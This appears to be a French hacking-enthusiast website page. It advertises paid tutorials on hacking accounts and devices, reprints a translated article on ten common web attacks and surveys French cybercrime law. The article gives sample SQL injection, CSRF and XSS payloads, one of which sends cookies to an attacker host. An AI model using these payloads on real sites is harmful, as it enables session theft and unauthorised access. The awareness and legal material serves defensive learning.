Sélectionner une page

N°1 Kali Linux

HACK THE PLANET

Je me nomme Numerius,

Et je suis un passionné de Linux

Bonjour à tous,

Pour commencer je vais me présenter.

Je suis Numerius et je suis un passionné de linux.

J’ai le plaisir de vous présenter mon Site Web :

< Le Saint Graal des Hackers >

C’est un Site Web spécialisé sur la sécurité informatique et dessus vous pourrez apprendre tout ce que vous devriez savoir sur le Hacking.

Mais avant de commencer, vous devais savoir que le Hacking est illégales sans le consentement du propriétaire et que je ne suis pas responsable de vos actes.

Que vous soyez débutant, ou un expert, vous en êtes les bienvenues, car j’ai comme passion l’informatique, la création de Site Web, le Web, le Dark Web, le Hacking et je serais ravi de partager mes passions avec vous.

Sur ce Site Web vous trouverez tous ce qu’il vous faut pour naviguer sur Internet, car j’ai créé des pages, où j’ai rassemblé le maximum de liens et de moteurs de recherches du monde, que vous pourrez utiliser pour effectuer vos recherches Web.

Vous s’aurez également comment installer et utiliser Windows 11, Kali linux, Parrot Security, BlackArch linux et divers Scripte de Hacking, pour linux et Windows.

Vous s’aurez également comment rooter votre Android, pour pouvoir installer Kali Nethunter et Andrax, afin de pouvoir faire de l’Hacking avec votre téléphone où votre tablette.

Je vous ai également partager des tas de Tutos sur comment Hacker une Wifi, un PC, Un téléphone, un Site Web, un compte Gmail, un compte Facebook et un compte Instagram.

Mais le plus important pour vous, je vous ais dégoter des tas de formations complète que vous pourrez suivre et télécharger sur le Hacking et la sécurité informatique, que je rajoute régulièrement sur mon Site Web, vous apprendrez toutes les bases sur la sécurité informatique et vous aurez tout ce qu’il faut afin d’évolué dans ce domaine.

Vous trouverez également des tas d’autres choses, que je vous laisserais découvrir par vous-même, afin de vous réserver des surprises, en vous inscrivants à mon Site Web, qui j’espère vous plairas.

Et sachez que je vous invite à venir me rejoindre sur mon groupe Facebook du Groupe des Hackers Francophones, qui est entièrement en Français et vous en êtes tousses les bienvenues.

Que vous trouverez à l’adresse dans le texte ci-dessous :

https://www.facebook.com/groups/groupedeshackersfranchophones

Et si vous n’avez pas Facebook, je vous présente une alternative, qui j’espère vous intéresseras, c’est un Réseau social privé, spécialisé sur le Hacking, le Web et le Dark Web, qui est entièrement Gratuit.

Dessus nous pourrons faire connaissance, créer des pages, des groupes, des blogs et échanger des messages, des photos, des vidéos, des musiques et des scripts de Hacking, afin de partager le maximum de chose sur notre passion qui est internet et le Hacking.

Que vous trouverez à l’adresse dans le texte ci-dessous :

https://www.world-hackers.com

Nous pourrions tousses nous donner rendez-vous toutes les nuits, du samedi au dimanche à 01h00 du matin, pour ce retrouvé ensembles, afin de discuter et faire connaissances.

Sachez que le Site Web est passé de Gratuit, à payant, car vu les factures qui arrive, je n’ai pas eu d’autres choix de vous demander une petite cotisation, car je ne suis pas très riche et que j’ai des dépenses.

Pour la modique sommes de 25 Euros, vous aurez un accès complet au Site Web et aux formations pendant 1 Année, afin que vous puissiez commencer votre apprentissage et j’aimerais vous dire que vous ne serez pas déçus de votre investissement.

Car Malheureusement, j’avais mis un bouton de Don et que pas un seul de mes visiteurs, n’a jamais pensé à moi et mon envie d’aller boire un petit café.

Vous pourrez payer, en passant par les passerelles sécurisées de payements de Stripe et de PayPal, alors n’hésitez pas à vous inscrire, car vous ne serez pas déçu, vous trouverez tous ce que vous devez savoir pour votre apprentissage dans le domaine de l’Hacking et de la sécurité informatique.

Et pour les fauchés comme moi, je vous propose d’essayer l’abonnement pendant 3 jours Gratuitement, afin de vous faire une idée du Site Web et de ce qu’il pourrait vous offrir.

Alors sans vous en dire plus, je vais vous laissez vous inscrire et payer ses quelques Euros, afin de découvrir mon Site Web et les formations, qui j’espère vous sera passionnant et vous soit enrichissant.

A tous je vous souhaite une bonne journée et à samedi à 01h00 du matin sur mon réseau social Privé spécial Hacker, qui lui est entièrement Gratuit.

Cordialement Numerius Armstrong.

C’est quoi un Hacker !!!

Top 10 Linux de Pentesting

Top 10 des Applications Android de Pentesting

Les Hackers les plus recherchés du Monde

Faites vos premières étapes dans la Sécurité Informatique.
Mais attention utilisez vos compétences dans votre propre laboratoire et avec le consentement du propriétaire.

La découverte de Malware

L’utilisation de Malwares sur Windows

L’utilisation de Malwares sur Kali Linux

10 Façons les plus populaires pour les Hackers de pirater votre Site Web

 

Quiz pop: qu’est-ce que Microsoft, Twitter, Facebook, NBC, ZenDesk et Drupal ont en commun?

Ils ont tous été récemment piratés.

Oui, le piratage est une menace croissante pour toutes les entreprises, grandes et petites.

Qu’il s’agisse de voler des données privées, de prendre le contrôle de votre ordinateur ou de fermer votre site Web, les pirates peuvent avoir un impact sérieux sur n’importe quelle entreprise, à tout moment. Nous avons mené une analyse en toute sécurité depuis son existence sur différents vecteurs d’attaque possibles et, par conséquent, il a été prouvé avec un record de sécurité des applications Web en Inde et est actuellement en train de se mondialiser. Il y a des détails sur lesquels Defencely avait travaillé pour se faire un nom sur le portefeuille CIO pour son immense succès avec la sécurité des technologies de l’information en tant que fournisseur de services. À un grand étonnement, Defencely a non seulement résisté à son client dans le passé, mais maintenant il a fourni des recherches révolutionnaires pour tous ses clients avec des livrables spéciaux, les services de Defencely ayant été optés. Mais il y a un côté quiDefencely a choisi d’opter pour l’amélioration du monde du Web, et c’est le HACKING ÉTHIQUE WHITE HATEqui fait son chemin dans le monde des affaires et fournit des services de sécurité approfondis pour une protection globale de la sécurité Web à ses précieux clients. En dehors de chacun des services fournis par Defencely, il a maintenu un standard sage sur la chasse aux bogues et donc une excellence éprouvée pour ses livrables de qualité que les experts de la sécurité de l’équipe rouge. L’équipe rouge a pris la responsabilité de représenter Defencely dans diverses gratitudes, que ce soit pour la diffusion des problèmes de sécurité de l’information, la participation à des conférences sur la sécurité de l’information pour fournir gratuitement des tests industriels de pénétration pour une approche initiale et cela seul avait abouti à une déduction sage de la façon dont la sécurité pourrait simplement être une illusion pour le monde des affaires et comment les entreprises pourraient être ruinées pendant la nuit.

Les pirates peuvent attaquer de nombreuses façons, mais voici les dix façons les plus courantes de menacer la sécurité de votre site et de votre entreprise:

10. ATTAQUES PAR INJECTION

Les attaques par injection se produisent lorsqu’il y a des failles dans votre base de données SQL, vos bibliothèques SQL ou même le système d’exploitation lui-même. Les employés ouvrent des fichiers apparemment crédibles avec des commandes cachées, ou «injections», sans le savoir.

Ce faisant, ils ont permis aux pirates d’obtenir un accès non autorisé à des données privées telles que les numéros de sécurité sociale, le numéro de carte de crédit ou d’autres données financières.

EXEMPLE D’ATTAQUE PAR INJECTION TECHNIQUE:

Une attaque par injection pourrait avoir cette ligne de commande:

Requête de chaîne = « SELECT * FROM comptes WHERE custID = ‘ » + request.getParameter (« id ») + « ‘ »;

Le pirate modifie le paramètre ‘id’ dans son navigateur pour envoyer: ‘ou’ 1 ‘=’ 1. Cela modifie la signification de la requête pour renvoyer tous les enregistrements de la base de données des comptes au pirate, au lieu des seuls clients visés.

9. ATTAQUES DE SCRIPT INTERSITE

Le Cross Site Scripting, également connu sous le nom d’attaque XSS, se produit lorsqu’une application, une URL «get request» ou un paquet de fichiers est envoyé à la fenêtre du navigateur Web et contourne le processus de validation. Une fois qu’un script XSS est déclenché, sa propriété trompeuse fait croire aux utilisateurs que la page compromise d’un site Web spécifique est légitime.

Par exemple, si www.example.com/abcd.html contient un script XSS, l’utilisateur peut voir une fenêtre contextuelle demandant ses informations de carte de crédit et d’autres informations sensibles.

EXEMPLE DE SCRIPT TECHNIQUE INTERSITE:

Un exemple plus technique:

(Chaîne) page + = “<nom d’entrée = ‘creditcard’ type = ‘TEXT’ value = ‘” + request.getParameter (“CC”) + “’>”;

L’attaquant modifie le paramètre ‘CC’ de son navigateur pour:

‘> <script> document.location =’ http: //www.attacker.com/cgi-bin/cookie.cgi? foo = ‘+ document.cookie </script>’

Cela provoque l’envoi de l’ID de session de l’utilisateur sur le site Web de l’attaquant, permettant au pirate de pirater la session actuelle de l’utilisateur. Cela signifie que le pirate a accès aux informations d’identification de l’administrateur du site Web et peut en prendre le contrôle complet. En d’autres termes, piratez-le.

8. ATTAQUES D’AUTHENTIFICATION ET DE GESTION DE SESSION BRISÉES

Si le système d’authentification des utilisateurs de votre site Web est faible, les pirates peuvent en profiter pleinement.

Les systèmes d’authentification impliquent des mots de passe, la gestion des clés, des identifiants de session et des cookies qui peuvent permettre à un pirate d’accéder à votre compte depuis n’importe quel ordinateur (tant qu’ils sont valides).

Si un pirate exploite le système d’authentification et de gestion de session, il peut assumer l’identité de l’utilisateur.

Effrayant en effet.

Posez-vous ces questions pour savoir si votre site Web est vulnérable à une attaque d’authentification et de gestion de session rompue:

  • Les informations d’identification de l’utilisateur sont-elles faibles (par exemple stockées à l’aide du hachage ou du chiffrement)?

  • Les informations d’identification peuvent-elles être devinées ou remplacées par des fonctions de gestion de compte faibles (par exemple, création de compte, changement de mot de passe, récupération de mot de passe, ID de session faibles)?

  • Les ID de session sont-ils exposés dans l’URL (par exemple, réécriture d’URL)?

  • Les ID de session sont-ils vulnérables aux attaques de fixation de session?

  • Les ID de session expirent-ils et les utilisateurs peuvent-ils se déconnecter?

Si vous avez répondu «oui» à l’une de ces questions, votre site pourrait être vulnérable à un pirate.

7. CLICKJACKING ATTACKS

Le détournement de clics, également appelé attaque de réparation d’interface utilisateur, est lorsqu’un pirate utilise plusieurs couches opaques pour inciter un utilisateur à cliquer sur la couche supérieure sans qu’il le sache.

Ainsi, l’attaquant «détourne» les clics qui ne sont pas destinés à la page réelle, mais à une page où l’attaquant veut que vous soyez.

Par exemple, en utilisant une combinaison soigneusement conçue de feuilles de style, de cadres iFrame et de zones de texte, un utilisateur peut être amené à croire qu’il tape le mot de passe de son compte bancaire, mais qu’il tape en fait dans un cadre invisible contrôlé par l’attaquant.

EXEMPLE DE DÉTOURNEMENT DE CLICS:

Voici un exemple en direct, mais sûr, du fonctionnement du détournement de clics:

http://attacker.kotowicz.net/alphabet-hero/game.html

Et voici une vidéo qui montre comment nous avons aidé Twitter à se défendre contre une attaque Clickjacking:

6. EMPOISONNEMENT DU CACHE DNS

L’empoisonnement du cache DNS implique d’anciennes données de cache que vous pensez peut-être ne plus avoir sur votre ordinateur, mais qui sont en fait «toxiques».

Également connu sous le nom de DNS Spoofing, les pirates peuvent identifier les vulnérabilités dans un système de nom de domaine, ce qui leur permet de détourner le trafic de serveurs légitimes vers un faux site Web et / ou serveur.

Cette forme d’attaque peut se propager et se répliquer d’un serveur DNS à un autre DNS, «empoisonnant» tout ce qui se trouve sur son chemin.

En fait, en 2010, une attaque d’empoisonnement DNS a complètement compromis le Great Firewall of China (GFC) temporairement et censuré certains contenus aux États-Unis jusqu’à ce que le problème soit résolu.

5. ATTAQUES D’INGÉNIERIE SOCIALE

Une attaque d’ingénierie sociale n’est pas techniquement un «hack».

Cela se produit lorsque vous divulguez des informations privées de bonne foi, comme un numéro de carte de crédit, via des interactions en ligne courantes telles que le courrier électronique, le chat, les sites de médias sociaux ou pratiquement n’importe quel site Web.

Le problème, bien sûr, est que vous n’entrez pas dans ce que vous pensez entrer.

Un exemple classique d’une attaque d’ingénierie sociale est l’arnaque «Microsoft tech support».

C’est quand quelqu’un d’un centre d’appels prétend être un membre du support technique MS qui dit que votre ordinateur est lent et / ou infecté, et peut être facilement réparé – à un coût, bien sûr.

Voici un article de Wired.com sur la façon dont un expert en sécurité a joué avec ce que l’on appelle le support technique Microsoft.

4. SYMLINKING – UNE ATTAQUE D’INITIÉ

Un lien symbolique est essentiellement un fichier spécial qui «pointe vers» un lien dur sur un système de fichiers monté. Une attaque de lien symbolique se produit lorsqu’un pirate informatique positionne le lien symbolique de telle manière que l’utilisateur ou l’application qui accède au point de terminaison pense qu’il accède au bon fichier alors qu’il ne l’est vraiment pas.

Si le fichier de point de terminaison est une sortie, la conséquence de l’attaque de lien symbolique est qu’il pourrait être modifié à la place du fichier à l’emplacement prévu. Les modifications apportées au fichier de point de terminaison peuvent inclure l’ajout, l’écrasement, la corruption ou même la modification des autorisations.

Dans différentes variantes d’une attaque par lien symbolique, un pirate peut être en mesure de contrôler les modifications apportées à un fichier, de s’accorder un accès avancé, d’insérer de fausses informations, d’exposer des informations sensibles ou de corrompre ou de détruire des fichiers système ou d’application vitaux.

3. ATTAQUES DE CONTREFAÇON DE DEMANDE INTERSITE

Une attaque de contrefaçon entre sites se produit lorsqu’un utilisateur est connecté à une session (ou un compte) et qu’un pirate utilise cette opportunité pour lui envoyer une fausse demande HTTP pour collecter ses informations de cookie.

Dans la plupart des cas, le cookie reste valide tant que l’utilisateur ou l’attaquant reste connecté au compte. C’est pourquoi les sites Web vous demandent de vous déconnecter de votre compte lorsque vous avez terminé – cela expirera la session immédiatement.

Dans d’autres cas, une fois que la session de navigation de l’utilisateur est compromise, le pirate peut générer des demandes à l’application qui ne pourront pas faire la différence entre un utilisateur valide et un pirate.

EXEMPLES D’ATTAQUES INTERSITES

Voici un exemple:

http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243

<img src = ”<span style =” color: red; ”> http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct# </span>” width = ”0 ″ height =” 0 ″ / >

Dans ce cas, le pirate crée une demande qui transférera de l’argent du compte d’un utilisateur, puis intègre cette attaque dans une demande d’image ou une iframe stockée sur divers sites sous le contrôle de l’attaquant.

2. ATTAQUES D’EXÉCUTION DE CODE À DISTANCE

Une attaque d’exécution de code à distance est le résultat de faiblesses de sécurité côté serveur ou côté client.

Les composants vulnérables peuvent inclure des bibliothèques, des répertoires distants sur un serveur qui n’ont pas été surveillés, des infrastructures et d’autres modules logiciels qui s’exécutent sur la base d’un accès utilisateur authentifié. Les applications qui utilisent ces composants sont toujours attaquées par le biais de scripts, de logiciels malveillants et de petites lignes de commande qui extraient des informations.

Les composants vulnérables suivants ont été téléchargés 22 millions de fois en 2011:

Contournement d’authentification Apache CXF ( http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451 )

En omettant de fournir un jeton d’identité, les attaquants pourraient invoquer n’importe quel service Web avec une autorisation complète.

1. ATTAQUE DDOS – ATTAQUE PAR DÉNI DE SERVICE DISTRIBUÉ

DDoS, ou déni de services distribué, est l’endroit où les services d’un serveur ou d’une machine sont rendus indisponibles pour ses utilisateurs.

Et lorsque le système est hors ligne, le pirate informatique compromet tout le site Web ou une fonction spécifique d’un site Web à son propre avantage.

C’est un peu comme se faire voler sa voiture quand on a vraiment besoin d’aller vite.

Le programme habituel d’une campagne DDoS est d’interrompre temporairement ou de supprimer complètement un système fonctionnant avec succès.

L’exemple le plus courant d’une attaque DDoS pourrait être l’envoi de tonnes de demandes d’URL vers un site Web ou une page Web en très peu de temps. Cela provoque un goulot d’étranglement côté serveur car le processeur vient de manquer de ressources.

Les attaques par déni de service sont considérées comme des violations de la politique d’utilisation appropriée d’Internet du Conseil d’architecture Internet et violent également les politiques d’utilisation acceptable de pratiquement tous les fournisseurs de services Internet.

[maxbutton id = « 1 ″]

Écrit par Shritam Bhowmick sur14 juin 2013

Avertissement aux Hackers avant toutes inscriptions à ce Site Web !!!

Vous êtes seul Maître de vos Actes !!!

La cybercriminalité est une notion floue et abstraite qui a vu le jour à la fin des années 1990. Elle désigne «toutes les infractions pénales susceptibles de se commettre sur ou au moyen d’un système informatique généralement connecté à un réseau.». Selon l’OCDE, la cybercriminalité s’assimile à «tout comportement illégal, ou contraire à l’éthique, ou non autorisé, qui concerne un traitement automatique de données et, ou de transmission de données».

Le terme cybercriminalité renvoie à une nouvelle forme de délinquance qui se situe dans un espace virtuel communément appelé le «cyberespace». En effet, si Internet a permis à des millions de personnes d’accéder à d’innombrables informations, son développement a par ailleurs engendré la naissance du «cybercrime». Le terme cyber se voit ainsi associé à toutes sortes de délinquance: la «cyberfraude», le «cyberterrorisme», la «cyberpédophilie», etc.

C’est pourquoi la France, mais également la communauté internationale, souhaitent se prémunir contre cette menace. Au niveau national, le législateur, la doctrine et la jurisprudence se sont saisis du domaine d’Internet contribuant ainsi à l’émergence d’une nouvelle branche du droit: le «cyber droit pénal». L’internaute est un justiciable et nul n’est censé ignorer la loi.

Le 10 juin 2009, les sages du Conseil Constitutionnel ont estimé que l’accès à Internet est un droit fondamental pour les citoyens, ce qui limite, notamment, les moyens d’actions du législateur dans sa lutte contre la cybercriminalité.

La cybercriminalité est une des formes de délinquance qui connait actuellement la croissance la plus forte. La rapidité et la fonctionnalité des technologies modernes, conjuguées à l’anonymat qu’elles permettent, facilitent la commission de nombreux crimes et délits.

En réalité, cet anonymat est une chimère. Outre les hackers et autres virtuoses du web, chaque internaute est assez aisément identifiable. Le titulaire de l’accès à Internet par un abonnement est une personne physique, ou morale, qui se voit attribuer temporairement, ou pour toute la durée de son abonnement, une adresse IP lui permettant de communiquer sur Internet. L’adresse IP correspond à un numéro qui permet l’identification de chaque ordinateur connecté à Internet et par conséquent, l’identification de son utilisateur.

D’autre part, en matière d’investigation, les ordinateurs sont de véritables «réservoirs de preuves». Ce qui autrefois était consigné sur du papier a toutes les chances d’être aujourd’hui consigné sous forme numérique. Tout informaticien armé des bons outils peut retrouver et exhumer tous fichiers et dossiers compromettants pourtant soigneusement effacés.

Il apparait que la cybercriminalité renvoie à 3 types d’infractions:
Tout d’abord, il y a les formes traditionnelles de criminalité facilitées par les technologies de l’information et de la communication. La fraude ou l’escroquerie en sont de parfaits exemples. En effet, les arnaques, les fraudes ou encore le non-respect du copyright préexistent à Internet mais on ne peut nier quela toilea favorisé leur développement.

  • Sont visées ensuite les infractions dites «de contenu» telles que la pédophilie via Internet, le racisme ou la xénophobie. On ne peut pas tout faire et tout dire sur Internet, c’est pourquoi tous les blogueurs doivent faire preuve d’une certaine prudence. En effet, ces derniers peuvent êtres poursuivis s’ils commettent des infractions (diffamation, etc.) via leurs blogs.

  • Enfin, il y a le nouveau crime, celui qui a vu le jour avec les nouveaux réseaux électroniques. Ce sont les infractions visant les systèmes d’information et les systèmes de traitement de données. Le piratage est sans doute l’exemple le plus connu.

  • Le point commun de toutes ces infractions est qu’elles peuvent être commises à grande échelle. La distance géographique entre le lieu où l’acte délictueux est commis, et ses effets peut être considérable: un hacker basé à Strasbourg peut tout à fait pirater le système de sécurité d’une banque parisienne.

Il convient de s’intéresser aux diverses infractions que peut recouper la cybercriminalité:

LE HACKING OU PIRATAGE

Le terme piratage désigne l’utilisation de connaissances informatiques à des fins illégales.

L’article 323-1 du code pénal sanctionne«le fait d’accéder ou de se maintenir frauduleusement, dans tout ou partie d’un système de traitement automatisé». La peine encourue est 2 ans d’emprisonnement et 30000€ d’amende. Celle-ci peut être portée à 3 ans d’emprisonnement et 45000€ d’amende lorsqu’il en résulte «soit la suppression, soit la modifications de données contenues dans le système, soit un altération du fonctionnement de ce système».

Le hacker encourt également, au titre des peines complémentaires, la confiscation du matériel informatique qui a servi ou était destiné à commettre l’infraction.

Il convient de préciser que le hacker engage sa responsabilité pénale mais également sa responsabilité civile. Il devra ainsi verser des dommages-intérêts à la victime pour l’indemniser.

LE SPOOFING

Le «spoofing» s’apparente au «hacking». Il désigne le fait d’intervenir dans les communications entre une ou plusieurs machines dans le but de se substituer frauduleusement à une ou plusieurs des machines. Cela permet d’intercepter des données, des correspondances, ou encore d’envoyer des données en usurpant l’identité du titulaire de la machine «spoofée».

La répression est la même que pour le hacking à savoir deux ans d’emprisonnement et 30000€ d’amende. Le «spoofer» engage également sa responsabilité civile.

LE CARDING ET LE SKIMMING

Le «carding» désigne la création de cartes virtuelles. C’est une fraude à la carte bleue. En effet, sur certains sites, il est possible d’acheter ou de vendre des accès à des comptes bancaires, des numéros de cartes volés, des copies de pistes magnétiques et des profils personnels complets.

Le «skimming», quant à lui, désigne une opération frauduleuse qui consiste à faire des copies magnétiques des cartes bancaires à l’aide d’un lecteur mémoire appelé «skimmer». C’est également une fraude à la carte bancaire. Le code confidentiel peut ainsi être capté à l’aide d’une micro-caméra. Les données acquises sont inscrites sur les pistes magnétiques d’une carte contrefaite. Ces fausses cartes peuvent alors être utilisées dans les commerces ou pour des retraits de numéraires dans les distributeurs automatiques de billets.

L’article L163-4 du Code monétaire et financier punit de sept ans d’emprisonnement et de 750000€ d’amende, «le fait de contrefaire ou de falsifier une carte de paiement ou de retrait, de faire ou de tenter de faire usage, en connaissance de cause, d’une carte de paiement ou de retrait contrefaisante ou falsifiée, d’accepter, en connaissance de cause, de recevoir un paiement au moyen d’une carte de paiement contrefaisante ou falsifiée».

LE SCAMMING

Le «scamming» désigne toutes les arnaques faites par le biais d’Internet. Les arnaques sont multiples mais elles ont toutes pour but d’obtenir de la victime qu’elle effectue un virement depuis son compte bancaire.

Par exemple, l’escroquerie «à la nigérianne» se fait par l’intermédiaire de mails où «un soi-disant homme d’affaire, un orphelin ou une veuve sollicite de l’aide pour transférer des millions de dollars bloqués dans un pays en raison de problèmes politiques adaptées en fonction de l’actualité politique internationale. L’escroc sollicite une somme d’argent afin, soit de corrompre les autorités locales, soit de payer l’entreprise de gardiennage détenant le coffre. Un pourcentage de l’ordre de 10 à 15% du montant total est généralement promis. Les transferts d’argent en cash se font via des sociétés spécialisées comme Western Union».

Le «scammer» et ses complices peuvent être poursuivis pour fraude. L’article 313-1 du code pénal sanctionne, au titre de l’escroquerie, «le fait, soit par l’usage d’un faux nom ou d’une fausse qualité, soit par l’abus d’une qualité vraie, soit par l’emploi de manœuvres frauduleuses, de tromper une personne physique ou morale et de la déterminer ainsi, à son préjudice ou au préjudice d’un tiers, à remettre des fonds, des valeurs ou un bien quelconque, à fournir un service ou à consentir un acte opérant obligation ou décharge». L’auteur encourt une peine de 5 ans d’emprisonnement et de 375000€ d’amende».

La manipulation informatique est en effet considérée comme une manœuvre frauduleuse.

LE SPAMMING

Le «spamming» désigne l’envoi de courriers électroniques non sollicités. Tous les internautes ont déjà reçus des «Spams», ces courriers qui ont pour effet de «pourrir» les boîtes mail. En France, on parle d’ailleurs de «pourriels».

Cette pratique peut être sanctionnée sous diverses qualifications :

  • D’une part, cela peut être assimilé à une entrave, ou au fait de fausser le fonctionnement d’un système de traitement automatisé de données par déni de service, si l’envoi massif de courriers électroniques a eu pour effet de paralyser le serveur mail de la victime.

  • D’autre part, cela peut être assimilé à des prospections directes au moyen d’un courrier électronique utilisant les coordonnées d’une personne physique qui n’a pas donné son consentement préalable à recevoir des prospections directes par ce moyen; ce qui est sanctionné par le code de la consommation.

LA CRYPTOLOGIE

La cryptologie désigne la technique qui consiste à crypter un message afin de le rendreinintelligible à celui qui ne possèdepas la clé de décodage. En France, l’usage de la cryptologie est libre depuis la loi pour la confiance dans l’économie numérique du 21 juin 2004.

Toutefois, l’article 132-79 du code pénal sanctionne la cryptologie «lorsqu’un moyen de cryptologie a été utilisé pour préparer ou commettre un crime ou un délit, ou pour en faciliter la préparation ou la commission».

Ainsi, le maximum de la peine privative de liberté encourue est relevé lorsque l’auteur ou le complice de l’infraction, à la demande des autorités judiciaires ou administratives, refuse de remettre la version en clair des messages chiffrés ainsi que les conventions secrètes nécessaires au déchiffrement.

LE GOOGLE BOMBING

Le «google bombing», ou «bombardement google», désigne l’activité qui consiste à diffuser en masse une information. Cette technique n’est pas illégale en soi. En effet, ce phénomène ne relève ni du piratage ni d’une quelconque faille, il exploite simplement la manière dont Google organise les résultats de recherche sur ses pages.

Cependant, lorsque les informations faisant l’objet du «google bombing» sont fausses voire diffamatoires, cela peut être fort préjudiciable pour la victime.

Concrètement, le pirate crée une multitude de sites et procède à leur référencement dans différents annuaires. Lorsqu’un internaute cherchera une information sur la personne victime du «bombing», elle tombera alors sur les faux sites.

Bien que nommée ainsi, la technique de «bombardement Google» est également observable sur d’autres moteurs de recherche tels que Yahoo! et Live Search.

LE CRACKING

Le cracking désigne en informatique, l’opération de faire un «crack» ou un «déplombage» de logiciel. C’est l’activité consistant à contourner un système de protection d’un logiciel ou plus généralement d’une œuvre, puis éventuellement à mettre à la disposition du public la nouvelle version du logiciel ou de l’œuvre.

L’article L335-3-1 du code de la propriété intellectuelle punit de 3 750€ d’amende les modifications non autorisées des logiciels mais également «le fait de porter atteinte sciemment, à des fins autres que la recherche, à une mesure technique afin d’altérer la protection d’une œuvre par un décodage, un décryptage, ou toute autre intervention personnelle destinée à contourner, neutraliser ou supprimer un mécanisme de protection ou de contrôle».

Il convient de préciser que le simple fait de procéder au «déplombage» d’une œuvre est sanctionné, sans qu’il soit besoin de prouver que le «cracker» a mis à disposition du public le logiciel ou l’œuvre sans son logiciel de protection.

L’article L335-3-1 du code de la propriété intellectuelle ajoute que le «cracker» qui met à disposition du public des logiciels de «cracking» encourt une peine d’emprisonnement de 6 mois et 30000€ d’amende.

La mise a disposition du public d’une œuvre ou d’un logiciel «cracké» constitue également un acte de contrefaçon et peut être puni pour ce chef. L’auteur encourt alors 5 ans d’emprisonnement et 500 000€ d’amende.

LA FRAUDE AUX SITES AUX ENCHÈRES

Les fraudeurs semblent particulièrement attirés par les nombreux sites de ventes aux enchères en ligne. Le fraudeur peut aussi bien être le vendeur que l’acheteur.

La fraude peut consister, d’une part, à tromper l’acheteur sur les caractéristiques essentielles du bien vendu, ou plus simplement à ne pas livrer le bien. Il se peut également que le bien vendu soit en réalité un bien volé, voire un bien contrefait.

A défaut de pouvoir établir sa bonne foi, l’acheteur encourt alors les peines relatives soit au recel, soit à la contrefaçon.

D’autre part, la fraude peut consister à ne pas payer le bien acheté alors même qu’il a été livré, ou à le payer avec des moyens frauduleux.

LA CYBERSEXUALITÉ

LA PÉDOPORNOGRAPHIE

La pédopornographie par Internet constitue une forme particulièrement grave d’exploitation sexuelle des enfants. A ce jour, on compte environ 100000 sites consacrés à la pédopornographie.

La pornographie infantile, ou pédopornographie, est définie par les Nations unies comme «toute représentation, par quelque moyen que ce soit, d’un enfant s’adonnant à des activités sexuelles explicites, réelles ou simulées, ou toute représentation des organes sexuels d’un enfant, à des fins principalement sexuelles».

La pédopornographie est illégale en France et dans la plupart des pays occidentaux. Le législateur français a d’ailleurs fait de la lutte contre la pédopornographie l’une des priorités de sa politique criminelle. Les affaires de pédophilie représentent, en France, environ 20 à 40% des affaires pénales touchant Internet chaque mois.

Les auteurs qu’il s’agisse des producteurs, d’intermédiaires ou de simples consommateurs d’images de mineurs à caractère pornographique peuvent faire l’objet de poursuites pénales sur différents fondements juridiques.

L’article 227-23 du code pénal sanctionne de cinq ans d’emprisonnement et de 75000€ d’amende «le fait, en vue de sa diffusion, de fixer, d’enregistrer ou de transmettre l’image ou la représentation d’un mineur lorsque cette image présente un caractère pornographique».

Il en est de même du «fait de diffuser une telle image ou représentation, par quelque moyen que ce soit, de l’importer ou de l’exporter, de la faire importer ou de la faire exporter».

Les peines sont portées à 7 ans d’emprisonnement et à 100000€ d’amende lorsque la diffusion de ces images s’est faite sur un réseau de télécommunication tel qu’internet.

Le simple fait de détenir une telle image, ou représentation, est puni de deux ans d’emprisonnement et 30 000 euros d’amende.

La représentation à caractère pédophile inclut les montages et dessins à caractère pédophile fabriqués à partir de photographies d’enfants, mais aussi les images à caractère pédophiles totalement virtuelles.

Ces dispositions sont également applicables aux images pornographiques d’une personne dont l’aspect physique est celui d’un mineur, sauf s’il est établi que cette personne était âgée d’au moins 18 ans au jour de la fixation ou de l’enregistrement de son image. Il existe donc une présomption de minorité qui fait peser la charge de la preuve sur le détenteur des images.

Est également sanctionné le fait de faire des propositions sexuelles à un mineur par un moyen de communications électroniques. Ainsi, «le fait pour un majeur de faire des propositions sexuelles à un mineur de 15 ans ou à une personne se présentant comme telle en utilisant un moyen de communication électronique est puni de 2 ans d’emprisonnement et de 30000€ d’amende». Les peines sont d’ailleurs aggravées à 5 ans d’emprisonnement et 75000€ d’amende lorsque les propositions aboutissent à une rencontre.

LE CYBERPROXÉNÉTISME

Comme tous les délinquants, les proxénètes ont de plus en plus recours à Internet pour développer leurs activités délictueuses. Ils encourent, dès lors, des peines aggravées.

En effet, l’article 225-7 du code pénal dispose que «le proxénétisme est puni de 10 ans d’emprisonnement et de 1500 000€ d’amende lorsqu’il est commis grâce à l’utilisation, pour la diffusion de message à destination d’un public non déterminé, d’un réseau de télécommunication».

De nombreux sites de proxénètes se cachent sous des appellations anodines telles que «massages», «rencontres», etc. ce qui rend leur identification plus délicate. Il convient de préciser qu’un site qui propose des services à caractère sexuel moyennant rémunération tombe également sous le coup du racolage.

LE TÉLÉCHARGEMENT ILLÉGAL

Le développement d’Internet est aussi au cœur du débat concernant le respect des droits de la propriété intellectuelle. Des millions de fichiers de musique et de films sont téléchargés illégalement grâce à des logiciels «peer to peer», ce qui justifie la mobilisation des auteurs qui entendent protéger leurs créations.

Il convenait de trouver le juste équilibre entre le droit fondamental que constitue l’accès à internet, et la protection de la propriété intellectuelle. C’est chose faite avec la promulgation de la loi HADOPI II.

L’infraction de téléchargement illégal vise «les manquements à l’obligation de surveillance de l’accès à Internet, pesant sur le titulaire d’un abonnement à un service en ligne, de veiller à ce que cet accès ne fasse pas l’objet d’une utilisation constituant une atteinte aux droits d’auteur.»

La Haute Autorité pour la Diffusion des Œuvres et la Protection des droits sur Internet (HADOPI) est donc chargée de mettre en œuvre la loi contre le téléchargement illégal via un dispositif de riposte graduée.

Ce dispositif de riposte graduée prévoit deux niveaux d’avertissement. Tout d’abord, l’internaute identifié recevra un avertissement par e-mail, puis en cas de récidive, un second par lettre recommandée. En cas de troisième infraction, une suspension de son abonnement internet pour une durée maximale d’un an pourra être prononcée par le juge, mais aussi une amende, voire une peine de prison. Le texte prévoit en effet une amende de 1500€, doublée en cas de récidive. Dans les cas les plus graves de contrefaçon, les délinquants pourront se voir infliger une amende allant jusqu’à 300000€ et une peine de trois années de prison.

A ce jour, on constate une baisse effective des réseaux peer-to-peer mais on assiste parallèlement au développement des sites de streaming.

Le Saint Graal des Hackers

Ce site Web a pour objectif de vous faciliter votre navigation Web

Et de vous montrer les bases de l’informatique.

